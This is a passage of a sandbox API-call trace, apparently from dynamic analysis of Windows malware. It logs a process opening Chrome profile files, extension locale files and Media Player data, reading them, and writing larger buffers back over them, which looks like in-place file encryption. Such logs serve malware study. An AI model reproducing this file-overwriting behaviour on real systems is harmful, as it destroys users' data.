Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0180.821] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.821] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3ebc [0180.822] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.822] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.822] ReleaseMutex (hMutex=0x168) returned 1 [0180.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0180.822] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.824] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2ebc [0180.824] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.825] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2ebc [0180.825] WriteFile (in: hFile=0x1cc, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.828] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0180.829] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.829] CloseHandle (hObject=0x1cc) returned 1 [0180.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0180.830] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.830] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x40fd [0180.830] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.831] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.831] ReleaseMutex (hMutex=0x168) returned 1 [0180.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0180.831] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.841] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x30fd [0180.841] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.847] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x30fd [0180.847] WriteFile (in: hFile=0x1cc, lpBuffer=0x25ad6d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad6d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.856] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0180.856] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.856] CloseHandle (hObject=0x1cc) returned 1 [0180.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0180.857] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.857] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x404e [0180.857] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.858] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.858] ReleaseMutex (hMutex=0x168) returned 1 [0180.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0180.858] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.918] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x304e [0180.919] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x304e [0180.924] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0180.925] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.925] CloseHandle (hObject=0x1cc) returned 1 [0180.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0180.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x19000 [0180.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0180.927] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.927] ReleaseMutex (hMutex=0x168) returned 1 [0180.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="History", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0180.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="History", cchWideChar=7, lpMultiByteStr=0x1f7a834, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="History", lpUsedDefaultChar=0x0) returned 7 [0180.927] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0181.049] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x18000 [0181.049] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0181.078] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x18000 [0181.078] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0181.079] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0181.079] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0181.079] CloseHandle (hObject=0x1cc) returned 1 [0181.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.080] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.080] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x28 [0181.081] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.081] ReleaseMutex (hMutex=0x168) returned 1 [0181.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Network Persistent State", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0181.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Network Persistent State", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Network Persistent State", lpUsedDefaultChar=0x0) returned 24 [0181.081] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fa5388, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa5388*, lpNumberOfBytesRead=0x2e9f2bc*=0x28, lpOverlapped=0x0) returned 1 [0181.083] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0181.083] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5b0, lpOverlapped=0x0) returned 1 [0181.083] CloseHandle (hObject=0x1cc) returned 1 [0181.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.085] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.085] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xc3 [0181.085] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.085] ReleaseMutex (hMutex=0x168) returned 1 [0181.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0181.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x1f7ad2c, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOG", lpUsedDefaultChar=0x0) returned 3 [0181.086] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ee0848, nNumberOfBytesToRead=0xc3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0848*, lpNumberOfBytesRead=0x2e9f2bc*=0xc3, lpOverlapped=0x0) returned 1 [0181.087] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0181.087] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x64b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x64b, lpOverlapped=0x0) returned 1 [0181.087] CloseHandle (hObject=0x1cc) returned 1 [0181.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1400 [0181.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.089] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.089] ReleaseMutex (hMutex=0x168) returned 1 [0181.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Safe Browsing Channel IDs", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0181.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Safe Browsing Channel IDs", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Safe Browsing Channel IDs", lpUsedDefaultChar=0x0) returned 25 [0181.089] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x2e9f2bc*=0x1400, lpOverlapped=0x0) returned 1 [0181.095] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0181.095] WriteFile (in: hFile=0x1cc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1988, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1988, lpOverlapped=0x0) returned 1 [0181.095] CloseHandle (hObject=0x1cc) returned 1 [0181.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.097] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.097] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x43 [0181.097] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.097] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.097] ReleaseMutex (hMutex=0x168) returned 1 [0181.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0181.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0181.097] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x43, lpOverlapped=0x0) returned 1 [0181.099] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0181.099] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0181.099] CloseHandle (hObject=0x1cc) returned 1 [0181.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0181.101] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.101] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1106c [0181.101] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0181.101] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0181.101] ReleaseMutex (hMutex=0x168) returned 1 [0181.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalMLS_3.wmdb", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0181.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalMLS_3.wmdb", cchWideChar=15, lpMultiByteStr=0x1f733cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalMLS_3.wmdb", lpUsedDefaultChar=0x0) returned 15 [0181.101] ReadFile (in: hFile=0x1cc, lpBuffer=0x2663838, 